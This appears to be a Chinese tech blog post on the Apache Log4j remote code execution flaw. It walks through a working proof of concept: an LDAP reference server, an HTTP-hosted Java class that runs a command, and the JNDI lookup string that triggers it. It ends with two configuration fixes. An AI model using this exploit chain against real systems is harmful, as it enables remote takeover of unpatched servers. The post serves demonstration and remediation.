Apache Log4j 远程代码执行漏洞及修补方案

GoogleVip8 1月前 ⋅ 229 阅读

Apache-Log4j

Apache Log4j 远程代码执行

攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响

image

参考:https://gitee.com/jby6666/apache-log4j-poc.git

步骤

  1. Compile Log4jRCE.java and start http server python -m http.server 8888
  2. Start ldap server
git clone git@github.com:mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"
  1. 启动log4j.java,然后就会发现命令行出现了I am Log4jRCE from remote!!!。底层就是会远程下载Log4jRCE.class,然后执行newInstance(),所以会执行static、构造函数代码。
public class log4j {

    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        logger.error("${jndi:ldap://127.0.0.1:1389/a}");
    }
}
public class Log4jRCE {

    static {
        System.out.println("I am Log4jRCE from remote!!!");
        try {
            String[] cmd = {"calc"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

修复方案:

(1)修改jvm参数 -Dlog4j2.formatMsgNoLookups=true

(2)修改配置 在应用classpath下添加log4j2.component.properties配置文件,log4j2.formatMsgNoLookups=true


全部评论: 0

    我有话说: